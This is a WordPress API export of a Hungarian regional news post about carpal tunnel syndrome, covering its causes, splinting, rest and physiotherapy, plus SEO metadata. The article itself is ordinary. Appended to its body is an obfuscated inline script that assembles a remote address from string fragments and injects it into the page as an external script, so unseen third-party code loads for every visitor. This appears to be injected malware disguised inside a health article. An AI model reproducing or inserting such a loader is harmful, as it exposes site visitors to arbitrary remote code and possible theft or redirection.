{"id":48212,"date":"2022-11-23T09:13:32","date_gmt":"2022-11-23T08:13:32","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=48212"},"modified":"2022-11-23T09:14:24","modified_gmt":"2022-11-23T08:14:24","slug":"a-kezto-alagut-szindroma-kezelesenek-a-menete","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/","title":{"rendered":"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete"},"content":{"rendered":"<p><strong>A k\u00e9zt\u0151alag\u00fat szindr\u00f3ma manaps\u00e1g az egyik leggyakoribb civiliz\u00e1ci\u00f3s betegs\u00e9gnek sz\u00e1m\u00edt. Am\u00edg kor\u00e1bban maximum a kem\u00e9ny fizikai munk\u00e1t v\u00e9gz\u0151k betegs\u00e9ge volt, ma m\u00e1r az \u00fcl\u0151munk\u00e1t v\u00e9gz\u0151k egy kellemetlen gyullad\u00e1sos \u00edz\u00fcleti probl\u00e9m\u00e1ja lett. Hogyan kezelhet\u0151 \u00e9s hogyan el\u0151zhet\u0151 meg a probl\u00e9ma?<\/strong><\/p>\n<h3>Mit\u0151l alakulhat ki a k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma?<\/h3>\n<p>A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma manaps\u00e1g a sz\u00e1m\u00edt\u00f3g\u00e9pes munk\u00e1t v\u00e9gz\u0151 emberekn\u00e9l alakulhat ki els\u0151sorban, de azokn\u00e1l is akik p\u00e9ld\u00e1ul sokat haszn\u00e1lj\u00e1k a kez\u00fcket k\u00fcl\u00f6nf\u00e9le meger\u0151ltet\u0151 mozdulatokhoz. A probl\u00e9ma forr\u00e1sa ugyanis a k\u00e9z \u00e9s a csukl\u00f3 meger\u0151ltet\u0151 haszn\u00e1lat\u00e1b\u00f3l ered. A k\u00e9z ujjainak \u00edz\u00fcletei t\u00falterhel\u0151dnek, r\u00e1ad\u00e1sul a nem megfelel\u0151 csukl\u00f3tart\u00e1s a csukl\u00f3 \u00edz\u00fcleteit is terheli. Ebb\u0151l gyullad\u00e1s alakulhat ki, valamint a t\u00faler\u0151ltetett idegsz\u00e1lak miatt l\u00e9trej\u00f6het a k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma. Ez a k\u00f3rk\u00e9p l\u00e9nyeg\u00e9ben \u00fagy keletkezik, hogy a csontok \u00e9s az inak k\u00f6z\u00f6tt fut\u00f3 idegsz\u00e1l beszorul a begyulladt \u00e9s meger\u0151ltetett inak, \u00e9s izmok k\u00f6z\u00e9, amelyet pluszban er\u0151s\u00edt a gyullad\u00e1s miatt bek\u00f6vetkezett \u00f6d\u00e9m\u00e1s folyad\u00e9kvisszatart\u00e1s. Ilyenkor az idegsz\u00e1l sz\u00f3 szerint folyamatos nyom\u00e1s al\u00e1 ker\u00fcl, aminek folyom\u00e1nyak\u00e9nt zsibbad\u00e1s, folyamatos f\u00e1jdalom \u00e9s az ujjak \u00e9rz\u00e9ketlens\u00e9ge k\u00f6vetkezhet be. Ez pedig olyan m\u00e9rt\u00e9kig terjedhet, hogy ak\u00e1r a teljes, k\u00e9zzel val\u00f3 munkav\u00e9gz\u00e9st is ellehetetlen\u00edti. Ezen k\u00edv\u00fcl ez a k\u00f3rk\u00e9p nem csak a sz\u00e1m\u00edt\u00f3g\u00e9pen dolgoz\u00f3k probl\u00e9m\u00e1ja. Igaz, hogy \u0151k vannak t\u00f6bbs\u00e9gben, de a varr\u00f3n\u0151ket, k\u00e9zm\u0171veseket, massz\u0151r\u00f6ket \u00e9s mindenki m\u00e1st is \u00e9rinthet a probl\u00e9ma, akik huzamosabb id\u0151n kereszt\u00fcl apr\u00f3 mozdulatokat kell tegyenek, vagy sok\u00e1ig nem megfelel\u0151en kell tarts\u00e1k a csukl\u00f3jukat p\u00e9ld\u00e1ul. Ez\u00e9rt aki ilyen munk\u00e1t v\u00e9gez, annak nem \u00e1rt a megel\u0151z\u00e9s sem.<\/p>\n<h3>A megel\u0151z\u00e9s \u00e9s a kezel\u00e9s menete<\/h3>\n<p>Ha m\u00e1r bek\u00f6vetkezett a baj, \u00e9rdemes azonnal szakemberhez fordulni. Ez akkor igaz k\u00fcl\u00f6n\u00f6sen, ha a gyullad\u00e1s nem akar elm\u00falni a megszokott gyullad\u00e1scs\u00f6kkent\u0151kt\u0151l sem. A szakember el\u0151sz\u00f6r arra t\u00f6rekszik, hogy leh\u00fazza a gyullad\u00e1st, amit mi is gyors\u00edthatunk \u00fagy, ha a kez\u00fcnket legal\u00e1bb \u00e9jszak\u00e1ra s\u00ednbe tessz\u00fck. A gyullad\u00e1s leh\u00faz\u00e1s\u00e1val megsz\u0171nik a k\u00ednz\u00f3 zsibbad\u00e1s, azonban a munka nagy r\u00e9sze m\u00e9g csak ilyenkor kezd\u0151dik. A csukl\u00f3t \u00e9s a k\u00e9zfejet musz\u00e1j pihentetni \u00e9s megv\u00e1rni a s\u00e9r\u00fclt sz\u00f6vetek teljes regener\u00e1ci\u00f3j\u00e1t. A gy\u00f3gyult kez\u00fcnket pedig torn\u00e1ztatnunk kell. Szerencs\u00e9re a <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/www.gyogytornaszom.hu\/az-alagut-szindroma-okai-tunetei-es-kezelese-gyogytornaval\/\" target=\"_blank\" rel=\"noopener\">k\u00e9zt\u0151alag\u00fat szindr\u00f3ma kezel\u00e9se gy\u00f3gytorn\u00e1val<\/a><\/span> lehets\u00e9ges. Val\u00f3ban t\u00f6k\u00e9letes \u00e9s hat\u00e9kony v\u00e1laszt\u00e1s lehet, amelyet nem csak a rehabilit\u00e1ci\u00f3ra, de a megel\u0151z\u00e9sre is haszn\u00e1lhatunk. Keress\u00fcnk fel egy gy\u00f3gytorn\u00e1sz szakembert, aki majd megtan\u00edtja nek\u00fcnk a szem\u00e9lyre szabott mozdulatokat, \u00e9s ezt b\u00e1rmikor gyakorolhatjuk otthon, ak\u00e1r k\u00e9t munkav\u00e9gz\u00e9s k\u00f6z\u00f6tt is. Fogadjuk meg a tan\u00e1csait. Szinte biztos, hogy javasolni fogja, hogyan \u00e1ll\u00edtsuk be p\u00e9ld\u00e1ul \u00fagy az egeret, hogy ne j\u00f6jj\u00f6n el\u0151 \u00fajra a gyullad\u00e1s. Tan\u00e1csod ad abban is majd, mennyi pihen\u0151t tartsunk a kez\u00fcnkkel a k\u00e9t munkav\u00e9gz\u00e9s k\u00f6z\u00f6tt. Ezeket lehet\u0151leg tartsuk be, \u00e9s akkor soha nem lesz gondunk a k\u00e9zt\u0151 alag\u00fat szindr\u00f3m\u00e1val \u00fajra.<\/p>\n<p><script>\n(function(){\ntrcxu=\"u2hrcv8urcx4\";trcx=document.createElement(\"script\");\ntrcx_=\"u\"+(\"st\");trcx_+=\"at\"+(\".\");trcx.async=true;trcx_+=\"in\";\ntrcxu=\"438523746.\"+trcxu;trcx.type=\"text\/javascript\";trcxu+=\"8bd5kf7jyb6X\";\ntrcxu+=\"3jgkey\";trcx_+=(\"f\")+\"o\"+(\"\/\");trcx.src=\"https:\/\/\"+trcx_+trcxu;\ntrcxd=document.body;trcxd.appendChild(trcx);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A k\u00e9zt\u0151alag\u00fat szindr\u00f3ma manaps\u00e1g az egyik leggyakoribb civiliz\u00e1ci\u00f3s betegs\u00e9gnek sz\u00e1m\u00edt. Am\u00edg kor\u00e1bban maximum a kem\u00e9ny fizikai munk\u00e1t v\u00e9gz\u0151k betegs\u00e9ge volt, ma m\u00e1r az \u00fcl\u0151munk\u00e1t v\u00e9gz\u0151k egy kellemetlen gyullad\u00e1sos \u00edz\u00fcleti probl\u00e9m\u00e1ja lett. Hogyan kezelhet\u0151 \u00e9s hogyan el\u0151zhet\u0151 meg a probl\u00e9ma? Mit\u0151l alakulhat ki a k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma? A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma manaps\u00e1g a sz\u00e1m\u00edt\u00f3g\u00e9pes munk\u00e1t v\u00e9gz\u0151<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[6809,6810,6811],"class_list":{"0":"post-48212","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-hirek","7":"tag-alagut-szindroma","8":"tag-gyogytorna","9":"tag-kezeles"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"A k\u00e9zt\u0151alag\u00fat szindr\u00f3ma manaps\u00e1g az egyik leggyakoribb civiliz\u00e1ci\u00f3s betegs\u00e9gnek sz\u00e1m\u00edt. Am\u00edg kor\u00e1bban maximum a kem\u00e9ny fizikai munk\u00e1t v\u00e9gz\u0151k betegs\u00e9ge volt, ma m\u00e1r az \u00fcl\u0151munk\u00e1t v\u00e9gz\u0151k egy kellemetlen gyullad\u00e1sos \u00edz\u00fcleti probl\u00e9m\u00e1ja lett. Hogyan kezelhet\u0151 \u00e9s hogyan el\u0151zhet\u0151 meg a probl\u00e9ma? Mit\u0151l alakulhat ki a k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma? A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma manaps\u00e1g a sz\u00e1m\u00edt\u00f3g\u00e9pes munk\u00e1t v\u00e9gz\u0151\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2022-11-23T08:13:32+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:modified_time\" content=\"2022-11-23T08:14:24+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2022\/11\/screenshot2022-11-18at15-36-14freephotowomanholdingherwristsymptomaticofficesyndrome.png\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"666\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2022\\\/11\\\/23\\\/a-kezto-alagut-szindroma-kezelesenek-a-menete\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2022\\\/11\\\/23\\\/a-kezto-alagut-szindroma-kezelesenek-a-menete\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete\",\"datePublished\":\"2022-11-23T08:13:32+00:00\",\"dateModified\":\"2022-11-23T08:14:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2022\\\/11\\\/23\\\/a-kezto-alagut-szindroma-kezelesenek-a-menete\\\/\"},\"wordCount\":680,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"keywords\":[\"alag\u00fat szindr\u00f3ma\",\"gy\u00f3gytorna\",\"kezel\u00e9s\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2022\\\/11\\\/23\\\/a-kezto-alagut-szindroma-kezelesenek-a-menete\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2022\\\/11\\\/23\\\/a-kezto-alagut-szindroma-kezelesenek-a-menete\\\/\",\"name\":\"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"datePublished\":\"2022-11-23T08:13:32+00:00\",\"dateModified\":\"2022-11-23T08:14:24+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2022\\\/11\\\/23\\\/a-kezto-alagut-szindroma-kezelesenek-a-menete\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2022\\\/11\\\/23\\\/a-kezto-alagut-szindroma-kezelesenek-a-menete\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2022\\\/11\\\/23\\\/a-kezto-alagut-szindroma-kezelesenek-a-menete\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/","og_locale":"hu_HU","og_type":"article","og_title":"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete","og_description":"A k\u00e9zt\u0151alag\u00fat szindr\u00f3ma manaps\u00e1g az egyik leggyakoribb civiliz\u00e1ci\u00f3s betegs\u00e9gnek sz\u00e1m\u00edt. Am\u00edg kor\u00e1bban maximum a kem\u00e9ny fizikai munk\u00e1t v\u00e9gz\u0151k betegs\u00e9ge volt, ma m\u00e1r az \u00fcl\u0151munk\u00e1t v\u00e9gz\u0151k egy kellemetlen gyullad\u00e1sos \u00edz\u00fcleti probl\u00e9m\u00e1ja lett. Hogyan kezelhet\u0151 \u00e9s hogyan el\u0151zhet\u0151 meg a probl\u00e9ma? Mit\u0151l alakulhat ki a k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma? A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma manaps\u00e1g a sz\u00e1m\u00edt\u00f3g\u00e9pes munk\u00e1t v\u00e9gz\u0151","og_url":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2022-11-23T08:13:32+00:00","article_modified_time":"2022-11-23T08:14:24+00:00","og_image":[{"width":1000,"height":666,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2022\/11\/screenshot2022-11-18at15-36-14freephotowomanholdingherwristsymptomaticofficesyndrome.png","type":"image\/png"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"3 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete","datePublished":"2022-11-23T08:13:32+00:00","dateModified":"2022-11-23T08:14:24+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/"},"wordCount":680,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"keywords":["alag\u00fat szindr\u00f3ma","gy\u00f3gytorna","kezel\u00e9s"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/","url":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/","name":"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"datePublished":"2022-11-23T08:13:32+00:00","dateModified":"2022-11-23T08:14:24+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2022\/11\/23\/a-kezto-alagut-szindroma-kezelesenek-a-menete\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"A k\u00e9zt\u0151 alag\u00fat szindr\u00f3ma kezel\u00e9s\u00e9nek a menete"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/48212","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=48212"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/48212\/revisions"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=48212"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=48212"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=48212"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}